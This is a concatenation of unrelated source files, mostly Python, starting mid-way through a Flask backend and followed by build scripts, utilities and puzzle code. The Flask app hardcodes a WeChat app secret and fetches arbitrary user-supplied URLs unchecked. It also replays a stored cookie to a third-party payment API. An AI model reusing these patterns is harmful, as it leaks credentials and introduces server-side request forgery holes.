'OPTIONS'])\n bodyless_methods = frozenset(['GET', 'HEAD', 'DELETE', 'OPTIONS'])\n\n def __init__(self, app):\n self.app = app\n\n def __call__(self, environ, start_response):\n request = Request(environ)\n method = request.args.get('METHOD', '').upper()\n if method in self.allowed_methods:\n method = method.encode('ascii', 'replace')\n environ['REQUEST_METHOD'] = method\n if method in self.bodyless_methods:\n environ['CONTENT_LENGTH'] = 0\n return self.app(environ, start_response)\n\n# 注册中间件\napp.wsgi_app = HTTPMethodOverrideMiddleware(app.wsgi_app)\napp.wsgi_app = leancloud.HttpsRedirectMiddleware(app.wsgi_app)\napp.wsgi_app = leancloud.engine.CookieSessionMiddleware(app.wsgi_app, app.secret_key)\n\n# 动态路由\napp.register_blueprint(todos_view, url_prefix='/todos')\napp.register_blueprint(users_view, url_prefix='/users')\n\n\n\n\n\n\n@app.route('/')\ndef index():\n return redirect(url_for('todos.show'))\n\ndef Response_headers(content): \n resp = Response(content) \n resp.headers['Access-Control-Allow-Origin'] = '*' \n return resp \n@app.route('/help')\ndef help():\n Todo = Object.extend('Todo')\n query = Query(Todo)\n\n query.equal_to('sent', \"0\")\n gameScores = query.find()\n print (gameScores)\n \n\n \n\n return render_template('help.html')\n\n@app.route('/cookie',methods=['GET','POST'])\ndef cookie(): \n global cookie_data\n print(request.form)\n print(request.form.to_dict())\n cookie_data = request.form.to_dict()['cookie']\n print (cookie_data) \n return \"New cookie :\" + cookie_data\n\n@app.route('/count',methods=['GET','POST'])\ndef count():\n print(request.form)\n url = request.form.to_dict()['url']\n print(url)\n response = requests.get(url)\n # 将这个图片从内存中打开,然后就可以用Image的方法进行操作了\n options = {}\n options[\"show\"] = \"true\"\n \"\"\" 带参数调用人流量统计 \"\"\"\n result =client_count.bodyNum(BytesIO(response.content).read(), options)\n #print(\"Result: \"+ str(result))\n return str(result).replace(\"\\'\",\"\\\"\")\n\n\n\n@app.route('/face',methods=['GET','POST'])\ndef face():\n print(request.form)\n url = request.form.to_dict()['url']\n print(url)\n\n # 将这个图片从内存中打开,然后就可以用Image的方法进行操作了\n \"\"\" 如果有可选参数 \"\"\"\n options = {}\n options[\"face_field\"] = \"age,beauty,expression,faceshape,gender,glasses,landmark,race,quality,facetype\"\n options[\"max_face_num\"] = 5\n options[\"face_type\"] = \"LIVE\"\n \"\"\" 带参数调用人脸检测 \"\"\"\n imageType = \"URL\"\n result =client_face.detect(url,imageType,options)\n print(\"Result: \"+ str(result))\n return str(result).replace(\"\\'\",\"\\\"\")\n\n\n@app.route('/recog_car',methods=['GET','POST'])\ndef recog_car():\n print(request.form)\n url = request.form.to_dict()['url']\n print(url)\n response = requests.get(url) # 将这个图片保存在内存\n # 将这个图片从内存中打开,然后就可以用Image的方法进行操作了\n \"\"\" 如果有可选参数 \"\"\"\n options = {}\n options[\"top_num\"] = 20\n \"\"\" 带参数调用车辆识别 \"\"\"\n result =client.carDetect(BytesIO(response.content).read(), options)\n print(result)\n return str(result).replace(\"\\'\",\"\\\"\")\n\n@app.route('/app2',methods=['GET','POST'])\ndef app2():\n print(request.form)\n if request.method == 'POST': \n # POST:\n # request.form获得所有post参数放在一个类似dict类中,to_dict()是字典化\n # 单个参数可以通过request.form.to_dict().get(\"xxx\",\"\")获得\n # ----------------------------------------------------\n # GET:\n # request.args获得所有get参数放在一个类似dict类中,to_dict()是字典化\n # 单个参数可以通过request.args.to_dict().get('xxx',\"\")获得\n global cookie_data\n headers={\n 'Connection': 'keep-alive',\n 'Content-Type':'application/json',\n 'Cookie': cookie_data,\n }\n print(\"Headers\"+str(headers))\n print(request.form.to_dict())\n data= str(request.form.to_dict()).replace(\"\\'\",\"\\\"\")\n data2={\"url\":\"http://www.baihecard.com:8860/?code=Ziv36RTE7ebWBRs159CDt6QgtfcxXjALdpiPV68eCfo#/\",\"usercode\":\"Ziv36RTE7ebWBRs159CDt6QgtfcxXjALdpiPV68eCfo\",\"agentId\":\"1000003\"}\n print (data)\n data2 = str(data2).replace(\"\\'\",\"\\\"\")\n print(\"Data2 :\"+data2)\n auth = requests.post(url = 'http://www.baihecard.com:8870/wxApi/user/check',data=data2,headers= headers)\n d = requests.post(url = 'http://www.baihecard.com:8870/wxPay/reqCardNo',data=data,headers= headers)\n if d.text == \"PARAM ERROR\":\n d = requests.post(url = 'http://www.baihecard.com:8870/wxApi/wxPay/tradeTest',data=data,headers= headers)\n print(auth.text)\n print(d.text)\n datax = request.form\n content = str(d.text) \n resp = Response_headers(content) \n return resp \n else: \n content = json.dumps({\"error_code\":\"1001\"}) \n resp = Response_headers(content) \n return resp \n\n\n@app.route('/wp-json/wp/v2/',methods=['GET','POST'])\ndef wp2(posts):\n url = \"blog.echo.cool/wp-json/wp/v2/\"+posts\n print(request.args)\n request_data = \"?\"\n for i in request.args:\n print(i)\n print(request.args[i])\n request_data = request_data+i+\"=\"+request.args[i]+\"&\"\n print(url+request_data)\n url = \"http://\"+url+request_data\n res = requests.get(url)\n #print(res.text)\n return res.text\n#https://w1109790800.leanapp.cn/wp-json/wp/v2/pages/14070\n@app.route('/wp-json/wp/v2/pages/',methods=['GET','POST'])\ndef wppages(id_data):\n url = \"blog.echo.cool/wp-json/wp/v2/pages/\"+id_data\n url = \"http://\"+url\n res = requests.get(url)\n #print(res.text)\n return res.text\n\n@app.route('/wp-json/wp/v2/posts/',methods=['GET','POST'])\ndef wp3(id_data):\n url = \"blog.echo.cool/wp-json/wp/v2/posts/\"+id_data\n url = \"http://\"+url\n res = requests.get(url)\n #print(res.text)\n return res.text\n\n@app.route('/wp-json/watch-life-net/v1/post/swipe',methods=['GET','POST'])\ndef wp4():\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/post/swipe\"\n url = \"http://\"+url\n res = requests.get(url)\n # print(res.text)\n return res.text\n#/wp-json/watch-life-net/v1/weixin/qrcodeimg /wp-json/watch-life-net/v1/weixin/getopenid\n@app.route('/wp-json/watch-life-net/v1/weixin/',methods=['GET'])\ndef wp29(func):\n print(request.form)\n print(request.form.to_dict())\n print(request)\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/weixin/\"+str(func)\n url = \"http://\"+url\n res = requests.get(url)\n # print(res.text)\n return res.text\n@app.route('/wp-json/watch-life-net/v1/weixin/getopenid',methods=['POST'])\ndef wp28():\n print(request.form)\n data = request.form\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/weixin/getopenid\"\n url = \"http://\"+url\n res = requests.post(url,json = data )\n # print(res.text)\n return res.text\n#post/like\n@app.route('/wp-json/watch-life-net/v1/post/',methods=['POST'])\ndef wp391(func):\n print(request.form)\n data = request.form\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/post/\"+str(func)\n url = \"http://\"+url\n res = requests.post(url,json = data )\n # print(res.text)\n return res.text\n#https://w1109790800.leanapp.cn/wp-json/watch-life-net/v1/comment/add\n@app.route('/wp-json/watch-life-net/v1/comment/add',methods=['POST'])\ndef wp39():\n print(request.form)\n data = request.form\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/comment/add\"\n url = \"http://\"+url\n res = requests.post(url,json = data )\n # print(res.text)\n return res.text\n#http://localhost:3000/wp-json/watch-life-net/v1/weixin/qrcodeimg\n@app.route('/wp-json/watch-life-net/v1/weixin/qrcodeimg',methods=['POST'])\ndef wp38():\n print(request.form)\n data = request.form\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/weixin/qrcodeimg\"\n url = \"http://\"+url\n res = requests.post(url,json = data )\n # print(res.text)\n return res.text\n#http://localhost:3000/wp-json/watch-life-net/v1/post/addpageview/13628\n@app.route('/wp-json/watch-life-net/v1/post/addpageview/',methods=['GET','POST'])\ndef wp5(id_data):\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/post/addpageview/\"+id_data\n url = \"http://\"+url\n res = requests.get(url)\n # print(res.text)\n return res.text\n#https://w1109790800.leanapp.cn/wp-content/plugins/wp-rest-api-for-app/qrcode/qrcode-14739.png\n@app.route('/wp-content/plugins/wp-rest-api-for-app/qrcode/',methods=['GET','POST'])\ndef wp599(file):\n url = \"blog.echo.cool/wp-content/plugins/wp-rest-api-for-app/qrcode/\"+file\n url = \"http://\"+url\n response = requests.get(url) # 将这个图片保存在内存\n response = Response(response, mimetype=\"image/jpeg\")\n # 将这个图片从内存中打开,然后就可以用Image的方法进行操作了\n # print(res.text)\n \n return response\n#http://localhost:3000/wp-json/watch-life-net/v1/options/enableComment\n@app.route('/wp-json/watch-life-net/v1/options/enableComment',methods=['GET','POST'])\ndef wp6():\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/options/enableComment\"\n url = \"http://\"+url\n res = requests.get(url)\n # print(res.text)\n return res.text\n#http://localhost:3000/wp-json/watch-life-net/v1/weixin/getopenid\n@app.route('/wp-json/watch-life-net/v1/weixin/getopenid',methods=['GET','POST'])\ndef wp7():\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/weixin/getopenid\"\n url = \"http://\"+url\n res = requests.get(url)\n # print(res.text)\n return res.text\n#http://localhost:3000/wp-json/watch-life-net/v1/comment/getcomments?postid=14748&limit=10&page=1&order=desc\n@app.route('/wp-json/watch-life-net/v1/comment/getcomments',methods=['GET','POST'])\ndef wp8():\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/comment/getcomments\"\n print(request.args)\n request_data = \"?\"\n for i in request.args:\n print(i)\n print(request.args[i])\n request_data = request_data+i+\"=\"+request.args[i]+\"&\"\n print(url+request_data)\n url = \"http://\"+url+request_data\n res = requests.get(url)\n #print(res.text)\n return res.text\n#https://w1109790800.leanapp.cn/wp-json/watch-life-net/v1/post/hotpostthisyear\n@app.route('/wp-json/watch-life-net/v1/post/',methods=['GET','POST'])\ndef wp17(parm):\n url = \"blog.echo.cool/wp-json/watch-life-net/v1/post/\"+parm\n url = \"http://\"+url\n res = requests.get(url)\n # print(res.text)\n return res.text\n\n@app.route('/robots.txt')\n@app.route('/favicon.svg')\n@app.route('/favicon.ico')\ndef static_from_root():\n return send_from_directory(app.static_folder, request.path[1:])\ndef get_file_content(filePath):\n with open(filePath, 'rb') as fp:\n return fp.read()\n\n\n@app.route('/sentMSG',methods=['GET','POST'])\ndef sentMSG():\n one_data={\n \"TransCode\":\"030112\",\n \"OpenId\":\"123456789\",\n \"Body\":\"\",\n }\n remind_data = ['又一个新任务?别怕,只要坚持一切都能完成',]\n res = requests.post(\"https://api.hibai.cn/api/index/index\",json = one_data)\n res = json.loads(res.text)['Body']\n\n for i in res:\n remind_data.append(i['word'])\n print(request.form.to_dict())\n formid = request.form.to_dict()['formid']\n openid = request.form.to_dict()['openid']\n if(formid != (None and \"the formId is a mock one\")and openid != None):\n print(formid)\n print(openid)\n keyword1={\n \"value\": \"完成番茄时间!\",\n }\n keyword2={\n \"value\": \"今天\",\n }\n keyword3={\n \"value\": remind_data[random.randint(0,len(remind_data)-1)],\n }\n data2={\n \"keyword1\":keyword1,\n \"keyword2\":keyword2,\n \"keyword3\":keyword3,\n }\n\n data = {\n \"touser\": openid,\n \"template_id\": \"jU-T8cBTkvhQ-xCzkGP4Ef8TrfeI3qkMQ_l_ZNaP9Ik\",\n \"page\": \"pages/index/index\",\n \"form_id\": formid,\n \"data\":data2,\n \"emphasis_keyword\": \"keyword1.DATA\"\n }\n headers={\n 'Connection': 'keep-alive',\n 'Content-Type':'application/json',\n }\n print(data)\n res = requests.get('https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=wx08d8f52ad361f6e8&secret=b635b95d8bda0e8dcb8cb9a989bdc4f0')\n access_token = json.loads(res.text)['access_token']\n res = requests.post(\"https://api.weixin.qq.com/cgi-bin/message/wxopen/template/send?access_token=\"+access_token,json = data)\n print(res.text)\n return res.text\n\n\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"228210410","text":"import os\nimport json\nimport re\n\n\nclass Main(object):\n\n #DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec'\n #DIR = r'C:\\dev\\projects\\idea\\product-definitions\\isda\\json'\n #DIR = r'C:\\dev\\partial\\spec'\n #DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec\\Credit\\temp'\n #DIR = r'C:\\shared\\prj\\idea\\isda-to-iso\\WEB-INF\\lib'\n #DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec\\InterestRate'\n #DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec\\Credit'\n DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec\\Credit\\success'\n #DIR = r'C:\\dev\\projects\\idea\\iso-to-isda-json-schema\\src\\test\\resources\\json\\spec\\Credit\\temp'\n\n def __init__(self):\n pass\n\n def start(self):\n filenames = os.listdir(self.DIR)\n for file in filenames:\n path = os.path.join(self.DIR, file)\n if not os.path.isfile(path):\n continue\n\n content = self.read_file(path)\n\n if 'record' in content:\n print('Skipping \\'{}\\'. Content already updated'.format(path))\n continue\n\n output_message = ''\n for line in content.split('\\n'):\n line = re.sub(r'//.*$', '', line)\n output_message += '{}\\n'.format(line)\n\n output_message = output_message.replace('\"Header\": {', '\"record\": { \"Header\": {')\n output_message = output_message.replace('},\\n \"expected\": {', '},\"requestContext\": {}\\n},\\n \"expected\": {')\n output_message = output_message.replace('\\n }\\n}', '\\n }, \"requestContext\": {}\\n}')\n output_message += '}'\n\n # JSON Prettify\n output_message = json.dumps(json.loads(output_message), indent=4)\n\n # Overwrite to same file\n self.write_file(path, output_message)\n print('Updated file \\'{}\\'.'.format(path))\n\n @staticmethod\n def read_file(path):\n with open(path, 'r') as f:\n return ''.join(f.readlines())\n\n @staticmethod\n def write_file(path, content):\n with open(path, 'w') as f:\n f.write(content)\n\n\nif __name__ == '__main__':\n main = Main()\n main.start()\n\n","sub_path":"Scripts/2017/ets/isda-to-iso-json-schema/json-modifier.py","file_name":"json-modifier.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"639073584","text":"#!/usr/bin/python3\r\n\r\n# build-flow.py\r\n\"\"\"Build-Flow.\r\n\r\nUsage:\r\n BuildFlow.py lint \r\n BuildFlow.py lint-format \r\n BuildFlow.py lint-analyze \r\n BuildFlow.py path \r\n BuildFlow.py proj-create [BUILD]\r\n BuildFlow.py proj-build \r\n BuildFlow.py unittest [FUNC]\r\n BuildFlow.py (-h | --help)\r\n BuildFlow.py (-v | --version)\r\n\r\nOptions:\r\n -h --help Show this screen.\r\n -v --version Show version.\r\n\r\n\"\"\"\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport platform\r\nimport unittest\r\n\r\nfrom subprocess import Popen, PIPE\r\n\r\nfrom docopt import docopt\r\n\r\n\r\nclass Utility():\r\n def __init__(self):\r\n self.name = \"\"\r\n\r\n def get_devtls_path(self):\r\n target_path = os.environ['CRDSWDEVTLS']\r\n if target_path and os.path.exists(target_path):\r\n return True, target_path\r\n return False, ''\r\n\r\n def get_devtls_tool_path_list(self, devtls_path):\r\n if not os.path.exists(devtls_path):\r\n return []\r\n\r\n devtls_path = os.path.abspath(devtls_path)\r\n\r\n path_list = []\r\n if 'Windows' == platform.system():\r\n if os.path.exists(os.path.join(devtls_path, '@Win32')):\r\n path_list.append(os.path.join(\r\n devtls_path, '@Win32/tool/7zip/18.05'))\r\n path_list.append(os.path.join(\r\n devtls_path, '@Win32/tool/cmake/3.12.2'))\r\n path_list.append(os.path.join(\r\n devtls_path, '@Win32/tool/llvm/7.0.1'))\r\n path_list.append(os.path.join(\r\n devtls_path, '@Win32/tool/python/3.7'))\r\n path_list.append(os.path.join(\r\n devtls_path, '@Win32/tool/rclone/1.45'))\r\n\r\n elif 'Linux' == platform.system():\r\n if os.exists(os.path.join(devtls_path, '@Linux')):\r\n print('not implement')\r\n\r\n elif 'Darwin' == platform.system():\r\n if os.exists(os.path.join(devtls_path, '@MacOS')):\r\n print('not implement')\r\n\r\n else:\r\n path_list = []\r\n\r\n return path_list\r\n\r\n def pipe_output(self, pipe_output):\r\n output = \"\"\r\n regex = re.compile(r'^b[\\\"|\\'|`]([\\S|\\s|:|\\\\|\\.|\\/|\\n]*)[\\\"|\\'|`]')\r\n pipe_string = str(pipe_output).strip()\r\n if pipe_output and pipe_string != \"None\" and pipe_string != \"\":\r\n match = regex.search(pipe_string)\r\n if match:\r\n match_result = match.group(1)\r\n match_result = match_result.replace('\\\\r', '')\r\n match_result = match_result.replace('\\\\\\\\', '\\\\')\r\n if match_result:\r\n new_str_lines = match_result.split(\"\\\\n\")\r\n\r\n index = 0\r\n for item in new_str_lines:\r\n if '' == item:\r\n new_str_lines.pop(index)\r\n index -= 1\r\n index += 1\r\n\r\n for new_str in new_str_lines:\r\n output = output + new_str + \"\\n\"\r\n return output\r\n\r\n def find_files(self, root_path, ext_name_list, output_dir_list):\r\n root_path = os.path.abspath(root_path)\r\n for dirName, subdirList, fileList in os.walk(root_path, topdown=False):\r\n for fname in fileList:\r\n for extname in ext_name_list:\r\n if fname.endswith(extname):\r\n abspath = os.path.join(root_path, dirName, fname)\r\n normpath = os.path.normpath(abspath)\r\n output_dir_list.append(normpath)\r\n break\r\n\r\n def is_ascii_string(self, input_string):\r\n return all(ord(c) < 128 for c in input_string)\r\n\r\n\r\nclass Lint():\r\n def __init__(self):\r\n self.name = \"\"\r\n\r\n def get_devtls_path(self):\r\n build_flow_utility = Utility()\r\n crdswdevtls_path = build_flow_utility.get_devtls_tool_path_list(\r\n os.environ['CRDSWDEVTLS'])\r\n return crdswdevtls_path\r\n\r\n def code_reformat(self, file_path, test_mode=False):\r\n ret_value = True\r\n file_path = os.path.abspath(file_path)\r\n print(file_path)\r\n\r\n style_file = \"-style=file\"\r\n style_llvm = \"-style=llvm\"\r\n style_google = \"-style=google\"\r\n style_mozilla = \"-style=mozilla\"\r\n style_jsonfmt = \"-style=\\\"{BasedOnStyle: mozilla, IndentWidth: 8}\" + \"\\\"\"\r\n\r\n new_env = os.environ\r\n if test_mode:\r\n style_target = \"-style=google\" # For test\r\n crdswdevtls = self.get_devtls_path()\r\n for item in crdswdevtls:\r\n new_env['PATH'] = new_env['PATH'] + ';' + item\r\n else:\r\n style_target = style_file\r\n\r\n try:\r\n process = Popen([\"clang-format\", \"-i\", style_target, file_path],\r\n stdin=PIPE, stdout=PIPE, stderr=PIPE, env=new_env)\r\n stdout, stderr = process.communicate()\r\n\r\n if not test_mode:\r\n file = open(\"build-flow.log\", 'a')\r\n\r\n stdout_str = str(stdout)\r\n if len(stdout_str) > 5:\r\n file.write(stdout_str + '\\n')\r\n\r\n stderr_str = str(stderr)\r\n if len(stderr_str) > 5:\r\n file.write(stderr_str + '\\n')\r\n\r\n file.close()\r\n except:\r\n ret_value = False\r\n print(\"An exception occurred\")\r\n\r\n return ret_value\r\n\r\n def code_analyze(self, file_path, test_mode=False):\r\n print(file_path)\r\n\r\n new_env = os.environ\r\n if test_mode:\r\n crdswdevtls = self.get_devtls_path()\r\n ret_value = os.path.exists(crdswdevtls)\r\n new_env['PATH'] = new_env['PATH'] + ';' + crdswdevtls\r\n\r\n process = Popen([\"clang-tidy\",\r\n \"-checks=cert*\",\r\n \"-enable-check-profile\",\r\n \"-header-filter=^include\",\r\n file_path, \"--\"],\r\n stdin=PIPE, stdout=PIPE, stderr=PIPE, env=new_env)\r\n\r\n # process = Popen([\"clang-tidy\", \"-checks=cert-*\", \"-enable-check-profile\", file_path, \"--\"]) #OK\r\n # process = Popen([\"clang-tidy\", \"-checks=cert-*\", \"-enable-check-profile\", \"--\", \"-header-filter\" ,file_path])\r\n # process = Popen([\"clang-tidy\", \"-enable-check-profile\", file_path])\r\n\r\n stdout, stderr = process.communicate()\r\n\r\n # if not test_mode:\r\n # file = open(\"build-flow.log\", 'a')\r\n # file.write(\"================================================================================\\n\")\r\n # file.write(file_path + '\\n')\r\n # file.write(\"--------------------------------------------------------------------------------\\n\")\r\n #\r\n # pipe_output_str = reformat_pipe_output(stdout)\r\n # file.write(pipe_output_str)\r\n # file.write(\"--------------------------------------------------------------------------------\\n\")\r\n #\r\n # pipe_output_str = reformat_pipe_output(stderr)\r\n # file.write(pipe_output_str)\r\n # file.write(\"--------------------------------------------------------------------------------\\n\")\r\n #\r\n # file.close()\r\n\r\n\r\n\r\nclass MakePackage():\r\n def __init__(self):\r\n self.name = \"\"\r\n\r\n \r\n\r\nclass Build():\r\n def __init__(self):\r\n self.name = \"\"\r\n\r\n def create(self, cmakefile_folder, output_folder, build_type):\r\n output_path = os.path.abspath(\r\n os.path.join(output_folder, sys.platform))\r\n input_path = os.path.abspath(cmakefile_folder)\r\n print(\"Input = \" + input_path)\r\n print(\"Output = \" + output_path)\r\n\r\n process = None\r\n if 'Windows' == platform.system():\r\n process = Popen([\"cmake\", input_path, \"-B\" +\r\n output_path, \"-DCMAKE_BUILD_TYPE=\"+build_type, \"-G\", \"Visual Studio 15 2017\"])\r\n else:\r\n process = Popen([\"cmake\", input_path, \"-B\" +\r\n output_path, \"-DCMAKE_BUILD_TYPE=\"+build_type])\r\n \r\n stdout, stderr = process.communicate()\r\n\r\n\r\ndef main():\r\n arguments = docopt(__doc__, version='build-flow 0.1a')\r\n\r\n output_list = []\r\n accepted_extname_list = [\".c\", \".cc\", \".cpp\", \".h\"]\r\n\r\n if os.path.exists(\"build-flow.log\"):\r\n os.remove(\"build-flow.log\")\r\n\r\n build_flow_lint = Lint()\r\n build_flow_build = Build()\r\n build_flow_utility = Utility()\r\n\r\n if arguments['lint']:\r\n input_folder = arguments['']\r\n print(\"lint command with input folder \", input_folder)\r\n\r\n build_flow_utility.find_files(\r\n input_folder, accepted_extname_list, output_list)\r\n for file_path in output_list:\r\n build_flow_lint.code_reformat(file_path)\r\n\r\n elif arguments['lint-format']:\r\n input_folder = arguments['']\r\n print(\"lint-format command with input folder \", input_folder)\r\n build_flow_utility.find_files(\r\n input_folder, accepted_extname_list, output_list)\r\n for file_path in output_list:\r\n build_flow_lint.code_reformat(file_path)\r\n\r\n elif arguments['lint-analyze']:\r\n input_folder = arguments['']\r\n print(\"lint-analyze command with input folder \", input_folder)\r\n build_flow_utility.find_files(\r\n input_folder, accepted_extname_list, output_list)\r\n for file_path in output_list:\r\n build_flow_lint.code_analyze(file_path)\r\n\r\n elif arguments['path']:\r\n input_folder = arguments['']\r\n print(\"path command with input folder \", input_folder)\r\n build_flow_utility.find_files(\r\n input_folder, accepted_extname_list, output_list)\r\n for file_path in output_list:\r\n if not build_flow_utility.is_ascii_string(file_path):\r\n print(file_path)\r\n\r\n elif arguments['proj-create']:\r\n input_target_path = arguments['']\r\n input_output_path = arguments['']\r\n\r\n input_build_type = 'Release'\r\n if arguments['BUILD']:\r\n if 'RELEASE' == arguments['BUILD'].upper():\r\n input_build_type = 'Release'\r\n elif 'DEBUG' == arguments['BUILD'].upper():\r\n input_build_type = 'Debug'\r\n elif 'RELWITHDEBINFO' == arguments['BUILD'].upper():\r\n input_build_type = 'RelWithDebInfo'\r\n\r\n print(\"proj-create command\")\r\n print(\" = \", input_target_path)\r\n print(\" = \", input_output_path)\r\n print(\"[BUILD] = \", input_build_type)\r\n build_flow_build.create(\r\n input_target_path, input_output_path, input_build_type)\r\n\r\n elif arguments['proj-build']:\r\n input_target_path = arguments['']\r\n print(\"proj-build command\")\r\n print(\" = \", input_target_path)\r\n\r\n else:\r\n print(arguments)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"Script/BuildFlow.py","file_name":"BuildFlow.py","file_ext":"py","file_size_in_byte":11053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"574354878","text":"import shutil\r\nimport os\r\n\r\ndef createFolder(directory):\r\n try:\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n except OSError:\r\n print ('Error: Creating directory. ' + directory)\r\n\r\n\r\ndef copyXTimes(src, dst, x: int):\r\n for i in range(1, x + 1):\r\n shutil.copy(src, '{}{}.docx'.format(dst, str(i)))\r\n\r\n\r\n\r\n\r\n\r\n#copyXTimes('Shimpan Letters/4Dan Shimpan No Parking Letter.docx', 'Shimpan Letters/', 3)\r\n#createFolder('./name/')","sub_path":"UofT Tournament Maker Project/generatefiles.py","file_name":"generatefiles.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"554757556","text":"from flask_restplus import Resource\n\nfrom ..util.dto import QuestionDto\nfrom ..service.question_service import QuestionService\n\napi = QuestionDto.api\n_question = QuestionDto.question\n\n\n@api.route(\"/\")\n@api.param(\"exam_id\", \"The Exam identifier\")\nclass QuestionList(Resource):\n @api.doc(\"get questions\")\n @api.marshal_list_with(_question, envelope=\"data\")\n def get(self, exam_id):\n \"\"\"List all registered question of given exam\"\"\"\n service = QuestionService()\n return service.read(exam_id)\n\n\n @api.response(201, \"Question successfully created.\")\n @api.doc(\"create a new question\")\n @api.expect(_question, validate=True)\n def post(self):\n \"\"\"Creates a new Question \"\"\"\n service = QuestionService()\n data = request.json\n return service.save(data=data)\n","sub_path":"app/main/controller/question_controller.py","file_name":"question_controller.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"190280712","text":"from collections import deque\n\nmaterials = [int(x) for x in input().split()]\nmagic_levels = deque([int(x) for x in input().split()])\n\npresents_magic = {\n 150: 'Doll',\n 250: 'Wooden train',\n 300: 'Teddy bear',\n 400: 'Bicycle'\n}\n\npresents_made = {\n 'Doll': 0,\n 'Wooden train': 0,\n 'Teddy bear': 0,\n 'Bicycle': 0\n}\n\nwhile materials and magic_levels:\n current_material = materials.pop()\n current_magic = magic_levels.popleft()\n\n if current_material == 0 and current_magic == 0:\n continue\n if current_material == 0:\n magic_levels.appendleft(current_magic)\n continue\n if current_magic == 0:\n materials.append(current_material)\n continue\n\n total_magic = current_magic * current_material\n if total_magic in presents_magic:\n present = presents_magic[total_magic]\n presents_made[present] += 1\n elif total_magic < 0:\n new_sum = current_magic + current_material\n materials.append(new_sum)\n elif total_magic not in presents_magic and total_magic > 0:\n current_material += 15\n materials.append(current_material)\n\ncondition_one = presents_made['Doll'] >= 1 and presents_made['Wooden train'] >= 1\ncondition_two = presents_made['Teddy bear'] >= 1 and presents_made['Bicycle'] >= 1\n\nif condition_one or condition_two:\n print(\"The presents are crafted! Merry Christmas!\")\nelse:\n print(\"No presents this Christmas!\")\n\nif materials:\n print(f'Materials left: {\", \".join(str(x) for x in reversed(materials))}')\nif magic_levels:\n print(f'Magic left: {\", \".join(str(x) for x in magic_levels)}')\n\n[print(f'{present}: {count}') for present, count in sorted(presents_made.items()) if count > 0]\n","sub_path":"Exams/Exam_Preparation_17_February_2020/01_santas_present_factory.py","file_name":"01_santas_present_factory.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"84072684","text":"#!/usr/bin/env python\n\n\"\"\"\nSome package to control the base of a turtlebot\n\"\"\"\n\nimport rospy\nimport actionlib\nfrom smach import State, StateMachine, Concurrence, Container, UserData\nfrom move_base_msgs.msg import MoveBaseAction\nfrom smach_ros import MonitorState, ServiceState, SimpleActionState, IntrospectionServer\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import Float32\nfrom nodes.setup_services import setup_environment\n\n\n\nclass Stop(State):\n\n def __int__(self):\n State.__init__(self, outcomes=['succeeded', 'aborted', 'preempted'])\n pass\n\n def execute(self, userdata):\n rospy.loginfo('Shutting down the state machine')\n return 'succeeded'\n\n\nclass BasicNav(State):\n\n def __int__(self):\n # Basic setup\n rospy.init_node('sample_nav', anonymous=False)\n rospy.on_shutdown(self.shutdown)\n\n # Set the low battery value\n self.low_battery_threshold = rospy.get_param(\"~low_battery_threshold\", 25)\n\n # Set the time allotted for the robot to get to a goal\n self.move_base_timeout = rospy.get_param(\"~move_base_timeout\", 20)\n\n # Created the move_base server\n self.move_base = actionlib.SimpleActionClient(\"move_base\", MoveBaseAction)\n rospy.loginfo('Waiting for the move_base server up to 60 seconds')\n\n # Waits up to 60 seconds for the rest of the nodes to start\n self.move_base.wait_for_server(rospy.Duration(60))\n rospy.loginfo('Connected to the move_base server')\n\n # Sets up the basic ROS move actions\n self.cmd_vel_pub = rospy.Publisher('cmd_vel', Twist)\n\n\n\n\n def shutdown(self):\n rospy.loginfo('The robot is shutting down!')\n self.cmd_vel_pub.publish(Twist())\n rospy.sleep(1)\n\n\nif __name__ == '__main__':\n try:\n BasicNav()\n except rospy.ROSInterruptException:\n rospy.logwarn('The system is shutting down!')","sub_path":"nodes/BasicNav.py","file_name":"BasicNav.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"322128544","text":"\n\n#calss header\nclass _REALISTICALLY():\n\tdef __init__(self,): \n\t\tself.name = \"REALISTICALLY\"\n\t\tself.definitions = [u'according to the facts and what is possible: ', u'in a way that seems as if it exists: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adverbs'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn 